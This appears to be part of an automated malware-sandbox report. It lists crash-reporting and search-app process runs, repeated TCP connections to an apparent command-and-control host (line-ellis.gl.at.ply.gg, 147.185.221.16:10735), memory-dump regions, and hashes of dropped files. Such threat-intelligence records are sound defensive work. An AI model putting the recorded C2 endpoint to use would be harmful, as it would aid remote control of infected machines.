"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 452 -p 4776 -ip 4776

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4776 -s 4048

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 536 -p 2996 -ip 2996

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2996 -s 3568

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 540 -p 1612 -ip 1612

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1612 -s 3532

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 496 -p 4728 -ip 4728

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4728 -s 3612

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 line-ellis.gl.at.ply.gg udp
US 147.185.221.16:10735 line-ellis.gl.at.ply.gg tcp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 160.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 147.185.221.16:10735 line-ellis.gl.at.ply.gg tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 147.185.221.16:10735 line-ellis.gl.at.ply.gg tcp
US 147.185.221.16:10735 line-ellis.gl.at.ply.gg tcp
US 8.8.8.8:53 64.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 147.185.221.16:10735 line-ellis.gl.at.ply.gg tcp
US 147.185.221.16:10735 line-ellis.gl.at.ply.gg tcp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 147.185.221.16:10735 line-ellis.gl.at.ply.gg tcp

Files

memory/3872-133-0x000001D867990000-0x000001D8679BE000-memory.dmp

memory/4024-134-0x0000000000400000-0x0000000000418000-memory.dmp

memory/3872-135-0x00007FFC2C850000-0x00007FFC2D311000-memory.dmp

memory/4024-137-0x0000000075330000-0x0000000075AE0000-memory.dmp

memory/4024-138-0x00000000058B0000-0x0000000005942000-memory.dmp

memory/3872-139-0x000001D8697C0000-0x000001D8697D0000-memory.dmp

memory/4024-140-0x0000000005950000-0x00000000059EC000-memory.dmp

memory/4024-141-0x00000000033B0000-0x00000000033C0000-memory.dmp

memory/4024-142-0x00000000060B0000-0x0000000006654000-memory.dmp

memory/4024-145-0x0000000006660000-0x00000000066C6000-memory.dmp

memory/4024-153-0x0000000006920000-0x0000000006970000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lgxgid20.pmp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2752-158-0x00000267F97B0000-0x00000267F97D2000-memory.dmp

memory/2752-160-0x00007FFC2C850000-0x00007FFC2D311000-memory.dmp

memory/2752-162-0x00000267F97A0000-0x00000267F97B0000-memory.dmp

memory/2752-163-0x00000267F97A0000-0x00000267F97B0000-memory.dmp

memory/2752-164-0x00000267F97A0000-0x00000267F97B0000-memory.dmp

memory/2752-165-0x00000267F97A0000-0x00000267F97B0000-memory.dmp

memory/3840-167-0x0000000003120000-0x0000000003121000-memory.dmp

memory/4276-173-0x000001F94D5D0000-0x000001F94D5F0000-memory.dmp

memory/3872-174-0x00007FFC2C850000-0x00007FFC2D311000-memory.dmp

memory/4276-176-0x000001F94D590000-0x000001F94D5B0000-memory.dmp

memory/4276-181-0x000001F94DBA0000-0x000001F94DBC0000-memory.dmp

memory/4024-185-0x0000000075330000-0x0000000075AE0000-memory.dmp

memory/2752-188-0x00007FFC2C850000-0x00007FFC2D311000-memory.dmp

memory/3872-189-0x000001D8697C0000-0x000001D8697D0000-memory.dmp

memory/4024-190-0x00000000033B0000-0x00000000033C0000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133352448772131836.txt

MD5 1813dd442ceacc789193d494f5950c47
SHA1 aefaec9cba5ee871851ce3fc2f2e5a00e3373f19
SHA256 d5024835c416b9b1f969c5120d1ca847509732b3915133941aa1cefa92930b97
SHA512 838d5df67f65c04a57fa4be60a4b8a47e3517c01ecf62600cf91c76ce269a83e3677a8ea655e42a8d8f2a11c8d92f8ea0bcdb599a4809e8255eae68049273504

C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\7ZZHJ0NR\microsoft.windows[1].xml

MD5 75fdba27ae111f9312c9b243a5e22d02
SHA1 0bbbf13546b05600dbeb285609adcff5e12c2e24
SHA256 62198536b21cc7cad5b396303999bb4ad75ad784e120525be4b8b8a503f05d89
SHA512 855ad3a011f011fc715020029dfce87fd1812bd6d94b5aafdc731b591fe24c681048009427d22da931fc13a1b7cdbca5e8336a79f03d6e226d9984118f2a306c

memory/4776-203-0x0000018B8D500000-0x0000018B8D520000-memory.dmp

memory/4776-207-0x0000018B8D1B0000-0x0000018B8D1D0000-memory.dmp

memory/4776-209-0x0000018B8D8C0000-0x0000018B8D8E0000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\7ZZHJ0NR\microsoft.windows[1].xml

MD5 75fdba27ae111f9312c9b243a5e22d02
SHA1 0bbbf13546b05600dbeb285609adcff5e12c2e24
SHA256 62198536b21cc7cad5b396303999bb4ad75ad784e120525be4b8b8a503f05d89
SHA512 855ad3a011f011fc715020029dfce87fd1812bd6d94b5aafdc731b591fe24c681048009427d22da931fc13a1b7cdbca5e8336a79f03d6e226d9984118f2a306c

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133352448772131836.txt

MD5 1813dd442ceacc789193d494f5950c47
SHA1 aefaec9cba5ee871851ce3fc2f2e5a00e3373f19
SHA256 d5024835c416b9b1f969c5120d1ca847509732b3915133941aa1cefa92930b97
SHA512 838d5df67f65c04a57fa4be60a4b8a47e3517c01ecf62600cf91c76ce269a83e3677a8ea655e42a8d8f2a11c8d92f8ea0bcdb599a4809e8255eae68049273504

C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\7ZZHJ0NR\microsoft.windows[1].xml

MD5 75fdba27ae111f9312c9b243a5e22d02
SHA1 0bbbf13546b05600dbeb285609adcff5e12c2e24
SHA256 62198536b21cc7cad5b396303999bb4ad75ad784e120525be4b8b8a503f05d89
SHA512 855ad3a011f011fc715020029dfce87fd1812bd6d94b5aafdc731b591fe24c681048009427d22da931fc13a1b7cdbca5e8336a79f03d6e226d9984118f2a306c

memory/2996-235-0x00000196A4E40000-0x00000196A4E60000-memory.dmp

memory/2996-238-0x00000196A4E00000-0x00000196A4E20000-memory.dmp

memory/2996-241-0x00000196A52B0000-0x00000196A52D0000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\7ZZHJ0NR\microsoft.windows[1].xml

MD5 75fdba27ae111f9312c9b243a5e22d02
SHA1 0bbbf13546b05600dbeb285609adcff5e12c2e24
SHA256 62198536b21cc7cad5b396303999bb4ad75ad784e120525be4b8b8a503f05d89
SHA512 855ad3a011f011fc715020029dfce87fd1812bd6d94b5aafdc731b591fe24c681048009427d22da931fc13a1b7cdbca5e8336a79f03d6e226d9984118f2a306c

memory/1612-253-0x0000024AC1CB0000-0x0000024AC1CD0000-memory.dmp

memory/1612-256-0x0000024AC1C70000-0x0000024AC1C90000-memory.dmp

memory/1612-259-0x0000024AC2080000-0x0000024AC20A0000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\7ZZHJ0NR\microsoft.windows[1].xml

MD5 75fdba27ae111f9312c9b243a5e22d02
SHA1 0bbbf13546b05600dbeb285609adcff5e12c2e24
SHA256 62198536b21cc7cad5b396303999bb4ad75ad784e120525be4b8b8a503f05d89
SHA512 855ad3a011f011fc715020029dfce87fd1812bd6d94b5aafdc731b591fe24c681048009427d22da931fc13a1b7cdbca5e8336a79f03d6e226d9984118f2a306c

memory/4728-274-0x000001B2DF560000-0x000001B2DF580000-memory.dmp

memory/4728-277-0x000001B2DF520000-0x000001B2DF540000-memory.dmp

memory/4728-279-0x000001B2DF930000-0x000001B2DF950000-memory.dmp

memory/4728-288-0x000001AADE000000-0x000001AADE77A000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_charmap_exe

MD5 406347732c383e23c3b1af590a47bccd
SHA1 fae764f62a396f2503dd81eefd3c7f06a5fb8e5f
SHA256 e0a9f5c75706dc79a44d0c890c841b2b0b25af4ee60d0a16a7356b067210038e
SHA512 18905eaad8184bb3a7b0fe21ff37ed2ee72a3bd24bb90cbfcad222cf09e2fa74e886d5c687b21d81cd3aec1e6c05891c24f67a8f82bafd2aceb0e0dcb7672ce7

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{0A6AC72E-ED8C-C16F-38B6-05831557CF24}

MD5 8aaad0f4eb7d3c65f81c6e6b496ba889
SHA1 231237a501b9433c292991e4ec200b25c1589050
SHA256 813c66ce7dec4cff9c55fb6f809eab909421e37f69ff30e4acaa502365a32bd1
SHA512 1a83ce732dc47853bf6e8f4249054f41b0dea8505cda73433b37dfa16114f27bfed3b4b3ba580aa9d53c3dcc8d48bf571a45f7c0468e6a0f2a227a7e59e17d62